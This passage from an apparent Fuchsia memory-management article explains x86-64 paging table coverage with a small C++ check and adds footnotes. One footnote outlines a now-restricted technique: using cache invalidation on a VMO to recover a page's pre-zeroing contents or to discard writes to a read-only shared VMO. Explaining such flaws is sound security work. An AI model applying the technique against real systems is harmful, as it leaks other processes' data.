- A Page Directory can reference 512 Page Tables, totalling 1GiB of virtual addresses.

- A Page Directory Pointer Table can reference 512 Page Directories, totalling 512GiB of virtual addresses.

- A Page Map Level 4 can reference 512 Page Directory Pointer Tables, totalling 256TiB of virtual addresses.
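These numbers follow from multiplying the 4KiB page size by 512 once per level. A tiny compile-time check, with Coverage as a hypothetical name:

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kPageSize = 4096;
constexpr uint64_t kEntries = 512;

// Bytes of virtual address space covered by one table at the given level
// (1 = Page Table, 2 = Page Directory, 3 = PDPT, 4 = PML4); level 0 is one page.
constexpr uint64_t Coverage(int level) {
  return level == 0 ? kPageSize : kEntries * Coverage(level - 1);
}

static_assert(Coverage(1) == (2ull << 20), "Page Table: 2MiB");
static_assert(Coverage(2) == (1ull << 30), "Page Directory: 1GiB");
static_assert(Coverage(3) == (512ull << 30), "PDPT: 512GiB");
static_assert(Coverage(4) == (256ull << 40), "PML4: 256TiB");
```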

That's all we need for mapping. There are other mapping schemes (5-level paging, bigger page sizes), but they more or less follow the same ideas.

[1] At the time of this writing, the kernel heap used memory directly from the physmap. However, there's an ongoing effort to make the kernel heap use virtual memory. See bug 30973.

[2] There are a lot of interesting side effects from exposing these operations to userspace. For example, when you get a physical page committed to your VMO, that page is zeroed out. If you issue a cache invalidate operation on a VMO as soon as you get it, you might be able to revert the zeroing if it is still sitting in the cache, and see whatever was in the page before it was zeroed out. You can also invalidate writes to a shared VMO for which you only have read-only access. This functionality has now been restricted in Fuchsia.

[3] These translations take a lot of time, so processors cache the results in something called a Translation Lookaside Buffer (TLB).